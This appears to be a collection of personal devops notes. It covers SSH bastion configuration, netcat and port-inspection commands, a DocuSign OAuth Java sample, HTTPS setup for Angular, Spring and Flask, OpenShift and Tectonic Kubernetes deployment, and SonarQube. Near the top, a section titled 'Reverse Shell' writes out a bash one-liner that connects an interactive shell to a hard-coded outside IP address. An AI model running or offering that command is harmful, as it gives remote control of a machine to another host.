Bastion Host

ssh -i key.pem ubuntu@privateip -o "ProxyCommand ssh -W %h:%p -i key.pem ubuntu@bastionip"

Bastion Host :
~/.ssh/config

Host bastion
Hostname ip
User ubuntu
IdentityFile key.pem

Host private
IdentityFile key.pem
User ubuntu
ProxyCommand ssh -W %h:%p bastion

----------------------------------------------

ssh-add key.pem

Host bastion
Hostname ip
User ubuntu
ForwardAgent yes

Host private
User ubuntu
ProxyCommand ssh -W %h:%p bastion

-------------------

Server : nc -lp 1110

Client : nc ip 1110

netstat
netstat -tulpn

ss
ss | grep ssh
lsof
lsof -i tcp:80

---------------------

Reverse Shell

/bin/bash -i >& /dev/tcp/34.218.246.4/1110 0>&1

--------

Docusign GO Live

Docusign go-live process is very confusing. Here are the steps below to make review pass using the JAVA SDK API calls.
Create a maven project with the following dependency.

import java.awt.Desktop;
import java.net.URI;
import java.util.List;

import org.apache.oltu.oauth2.common.token.BasicOAuthToken;

import com.docusign.esign.api.AuthenticationApi;
import com.docusign.esign.api.EnvelopesApi;
import com.docusign.esign.client.ApiClient;
import com.docusign.esign.client.Configuration;
import com.docusign.esign.client.auth.AccessTokenListener;
import com.docusign.esign.model.Envelope;
import com.docusign.esign.model.EnvelopesInformation;
import com.docusign.esign.model.LoginInformation;

public class DocusignTest {

    private static final String CODE = "";
    private static final String TOKEN = "";

    public static void main(String[] args) throws Exception {

        boolean getCode = false;
        boolean update = false;

        String integratorKey = "your integrator key which you want to promote ";
        String clientSecret = "your secret key";

        String redirectURL = "your redirect url";
        String authServerUrl = "https://account-d.docusign.com";
        String restApiUrl = "https://demo.docusign.net/restapi";

        ApiClient apiClient = new ApiClient(authServerUrl, "docusignAccessCode", integratorKey, clientSecret);
        apiClient.setBasePath(restApiUrl);
        apiClient.configureAuthorizationFlow(integratorKey, clientSecret, redirectURL);
        Configuration.setDefaultApiClient(apiClient);

        if (getCode) {
            String oauthLoginUrl = apiClient.getAuthorizationUri();
            Desktop.getDesktop().browse(URI.create(oauthLoginUrl));
        } else {

            apiClient.getTokenEndPoint().setCode(CODE);
            apiClient.registerAccessTokenListener(new AccessTokenListener() {
                @Override
                public void notify(BasicOAuthToken token) {
                    System.out.println("Got a fresh token: " + token.getAccessToken());
                }
            });

            if (update) {
                apiClient.updateAccessToken();
                System.out.println(apiClient.getAccessToken());
            } else {
                apiClient.setAccessToken(TOKEN, 28800l);
                String accountId = getBaseUri(apiClient);

                EnvelopesApi envelopesApi = new EnvelopesApi(apiClient);
                EnvelopesApi.ListStatusChangesOptions options = envelopesApi.new ListStatusChangesOptions();
                String date = "May 22, 2018";
                options.setFromDate(date);
                EnvelopesInformation envelopes = envelopesApi.listStatusChanges(accountId, options);

                List<Envelope> envelopes1 = envelopes.getEnvelopes();
                for (Envelope envelope : envelopes1) {
                    EnvelopesApi envelopesApi1 = new EnvelopesApi();
                    Envelope env = envelopesApi1.getEnvelope(accountId, envelope.getEnvelopeId());
                    System.out.println(env.getEnvelopeId());
                    Thread.sleep(2000);
                }
            }

        }

    }

    public static String getBaseUri(ApiClient apiClient) {
        try {
            AuthenticationApi authApi = new AuthenticationApi(apiClient);
            LoginInformation loginInfo = authApi.login();
            String accountId = loginInfo.getLoginAccounts().get(0).getAccountId();
            String baseUrl = loginInfo.getLoginAccounts().get(0).getBaseUrl();
            String[] accountDomain = baseUrl.split("/v2");
            apiClient.setBasePath(accountDomain[0]);
            Configuration.setDefaultApiClient(apiClient);
            return accountId;
        } catch (Exception ex) {
            System.out.println("Error: " + ex);
            return null;
        }
    }
}

Fill all the fields "redirectURL", "integratorKey" and "clientSecret".

First, run the program by setting getCode=true;

Now copy the code from your redirect URL in the browser and assign it to "CODE" constant field.

Now make getCode = false and make update=true;

Now run and you see the "token" in the console. Copy that and assign it to the TOKEN constant field.

Now run the Program again by making update=false. If you make 20+ successful transactions ( like getting the 20+ different envelopes), your review should pass.

Enabling HTTPS for your Angular-Spring Website

To enable HTTPS for your website you’ll need to get and configure the required SSL/TLS certificates on your server. Start with choosing a trusted certificate provider. There are many authorities who give certificate free for 90 days. "Let’s Encrypt" is most popular open Certificate Authority. "SSL for free" issues certificates using "Let’s Encrypt"

1. Go to SSL FOR FREE

2. Enter your website to secure ( IP address do not work, you have to enter a registered domain name )

3. Select Manual Verification ( DNS ) option

4. Manually verify Domain

5. Go into the DNS management page that your domain and add TXT records with given key and value.

6. Now download SSL certificate.

The downloaded archive will have a certificate, bundle, and key. Extract the zip file and copy certificate and key to your ubuntu server.

Now you have to install this certificate in client and server.

Client Installation.

For the angular client, you need to add the following options to ng serve command in the package.json

--port 443 --disableHostCheck true --ssl --ssl-cert /home/ubuntu/certificate.crt --ssl-key /home/ubuntu/private.key

Note that port is 443. You have to open the port 443 in your security Group/ Firewall.
"scripts": { "ng": "ng", "start": "ng serve --host 0.0.0.0", "build": "ng build --prod", "test": "ng test", "lint": "ng lint", "e2e": "ng e2e" }

Restart client.

Server Installation.

This tutorial assumes that your server is Java Spring Boot.
You need to generate a key store for the server.
openssl pkcs12 -export -in certificate.crt -inkey private.key -out keystore.p12 -name server

This above step will ask for a password. Please enter the password and remember it.

Go to application.properties file and add following key value pairs.
server.port: 8443 server.ssl.key-store: keystore.p12 server.ssl.key-store-password: <your_password> server.ssl.keyStoreType: PKCS12 server.ssl.keyAlias: server Now clean buid and restart the server.

For python Flask Server.

from flask import Flask app = Flask(__name__) @app.route("/") def hello(): return "Hello World!" if __name__ == "__main__": app.run(host='0.0.0.0',ssl_context=('/home/ubuntu/certificate.crt', '/home/ubuntu/private.key')) port is 5000 by default.

Now you can access your website using https://your-domain.com

Also, import the certificate to java trust store.

Import to trust store :
keytool -import -alias server -keystore /usr/lib/jvm/java-8-oracle/jre/lib/security/cacerts -file /home/ubuntu/certificate.crt

To know your java home on ubuntu

readlink -f /usr/bin/java | sed "s:bin/java::"

$(readlink -f /usr/bin/java | sed "s:bin/java::")lib/security/cacerts

Container Orchestration using OpenShift.

Login/Signup OpenShift Online ( free ) https://www.openshift.com/

Download the command line OpenShift client from HERE.

Extract the archive and go the directory.
Add current directory to path
export PATH=$(pwd):$PATH

narayan@ubuntu:~/Downloads/openshift-origin-client-tools-v3.9.0-alpha.3-78ddc10-linux-64bit$ oc login
Authentication required for https://api.starter-us-west-1.openshift.com:443 (openshift)
Username: #your username#
Password: #your password#
Login successful.

You can create a new project using the GUI or command line, let us create a project using commandline tool for the purpose of this tutorial.
Use a unique name for the project.

narayan@ubuntu:~/Downloads/openshift-origin-client-tools-v3.9.0-alpha.3-78ddc10-linux-64bit$ oc new-project test-templates

Now using project "test-templates" on server "https://api.starter-us-west-1.openshift.com:443".
You can add applications to this project with the 'new-app' command. For example, try:
oc new-app centos/ruby-22-centos7~https://github.com/openshift/ruby-ex.git
to build a new example application in Ruby.

You can see that the project is created in the GUI.

Go inside project, you see that there are no applications deployed.

Now let us deploy a simple hello-world-web docker image on the cluster

narayan@ubuntu:~/Downloads/openshift-origin-client-tools-v3.9.0-alpha.3-78ddc10-linux-64bit$ oc new-app narayan1ap/hello-world-web

--> Found Docker image 5c64ec0 (39 minutes old) from Docker Hub for "narayan1ap/hello-world-web"
* An image stream will be created as "hello-world-web:latest" that will track this image
* This image will be deployed in deployment config "hello-world-web"
* Port 5000/tcp will be load balanced by service "hello-world-web"
* Other containers can access this service through the hostname "hello-world-web"

--> Creating resources ...
imagestream "hello-world-web" created
deploymentconfig "hello-world-web" created
service "hello-world-web" created
--> Success
Application is not exposed. You can expose services to the outside world by executing one or more of the commands below:
'oc expose svc/hello-world-web'
Run 'oc status' to view your app.

Note that the docker image should not run as a root user otherwise you will get a warning message like below.

[WARNING] Image "example" runs as the 'root' user which may not be permitted by your cluster administrator.

By default, all containers that we try and launch within OpenShift, are set blocked from “RunAsAny” which basically means that they are not allowed to use a root user within the container. This prevents root actions such as chown or chmod from being run and is a sensible security precaution as should a user be able to perform a local exploit to break out of the container, then they would not be running as root on the underlying container host.

Refer this article: How to enable docker image to run as non-root user.

After successful deploy, GUI looks like below. You can see that there is no route associated with the deploy.

Lets associate route.

narayan@ubuntu:~/Downloads/openshift-origin-client-tools-v3.9.0-alpha.3-78ddc10-linux-64bit$ oc expose svc/hello-world-web
route "hello-world-web" exposed

Now you can click on the route and access the APP.

Tectonic on AWS with Terraform - PART II

Deploying a simple application on AWS Tectonic Cluster

We have created Tectonic cluster and accessed it with kubectl command in Part I
Now we will try to deploy a simple application on this cluster.

Deployments: Run multiple copies of a container across multiple nodes
Services: Endpoint that load balances traffic to containers run by a deployment

Copy the following YAML into a file named simple-deployment.yaml. apiVersion: extensions/v1beta1 kind: Deployment metadata: name: simple-deployment namespace: default labels: k8s-app: simple spec: replicas: 3 template: metadata: labels: k8s-app: simple spec: containers: - name: nginx image: quay.io/coreos/example-app:v1.0 ports: - name: http containerPort: 80 The parameter replicas: 3, will create 3 running copies.
Image: quay.io/coreos/example-app:v1.0 defines the container image to run, hosted on Quay.io.

Then, copy the following YAML into a file named simple-service.yaml.

kind: Service apiVersion: v1 metadata: name: simple-service namespace: default spec: selector: k8s-app: simple ports: - protocol: TCP port: 80 type: LoadBalancer
$ kubectl create -f simple-deployment.yaml
$ kubectl get deployments
$ kubectl create -f simple-service.yaml
$ kubectl get services -o wide

Get the EXTERNAL-IP URL and access the Application. The application will be up in few minutes.

Tectonic (Enterprise Kubernetes) on AWS with Terraform - PART 1

Create a CoreOS account here : https://account.coreos.com/login
You can use your Gmail to sign in and get a free license for 10 nodes.

Create a t2 small ec2 ubuntu 64 bit machine and login

$sudo apt-get update

$sudo apt install gnupg2
$sudo apt install unzip
$sudo apt install awscli




$curl -O https://releases.tectonic.com/releases/tectonic_1.8.4-tectonic.3.zip
$curl -O https://releases.tectonic.com/releases/tectonic_1.8.4-tectonic.3.zip.sig
$gpg2 --keyserver pgp.mit.edu --recv-key 18AD5014C99EF7E3BA5F6CE950BDD3E0FC8A365E
$gpg2 --verify tectonic_1.8.4-tectonic.3.zip.sig tectonic_1.8.4-tectonic.3.zip

$unzip tectonic_1.8.4-tectonic.3.zip
$cd tectonic_1.8.4-tectonic.3

$export PATH=$(pwd)/tectonic-installer/linux:$PATH
$terraform init platforms/aws

$mkdir -p build/${CLUSTER}
$export CLUSTER=my-cluster
$cp examples/terraform.tfvars.aws build/${CLUSTER}/terraform.tfvars

vi build/${CLUSTER}/terraform.tfvars

Make sure you set these properties

tectonic_aws_region = "ap-south-1"
tectonic_base_domain = "yourdomain.com" // your base domain from Rout53
tectonic_license_path = "/home/ubuntu/license.txt"
tectonic_pull_secret_path = "/home/ubuntu/pullsecret.json"
tectonic_cluster_name = "test" // your cluster name

Note: Pull secret and license files are available in your core os account.

save changes wq!

$aws configure

AWS Access Key ID : Enter Access Key ID here
AWS Secret Access Key :Enter Secret Key here
Default region name: ap-south-1
Default output format: Leave Empty

$export TF_VAR_tectonic_admin_email="your google email used for CoreOS"
$export TF_VAR_tectonic_admin_password="your password"

$ terraform plan -var-file=build/${CLUSTER}/terraform.tfvars platforms/aws
$ terraform apply -var-file=build/${CLUSTER}/terraform.tfvars platforms/aws

After few minutes ( 5 to 10 ) , cluster will be up and you can access it here :
https://test.yourdomain.com

The username password is same as your CoreOS account.

Accessing Cluster with kubectl commandline :

Now download kubectl-config and kubectl files from your cluster.

$ chmod +x kubectl
$ mv kubectl /usr/local/bin/kubectl
$ mkdir -p ~/.kube/ # create the directory
$ cp path/to/file/kubectl-config-test $HOME/.kube/config # rename the file and copy it into the directory
$ export KUBECONFIG=$HOME/.kube/config

Try to get nodes and see if you can see the nodes.

$ kubectl get nodes

In next entry, we will see how to Deploy a simple Application with kubectl commandline

Static Code Analysis with Sonarqube docker image.

sudo apt-get update
sudo apt-get install default-jdk
sudo apt install docker.io
sudo usermod -aG docker $USER
logout

// login again

docker pull sonarqube
docker run -d --name sonarqube -p 9000:9000 -p 9092:9092 sonarqube

Sonar server has been started on this machine. Now you can login in to http://ip_address:9000 with admin/admin

Analyse a project.

sudo apt-get install maven
cd your_project_pom_directory
mvn sonar:sonar -Dsonar.host.url=http://ip_address:9000 -Dsonar.login=your_sonar_token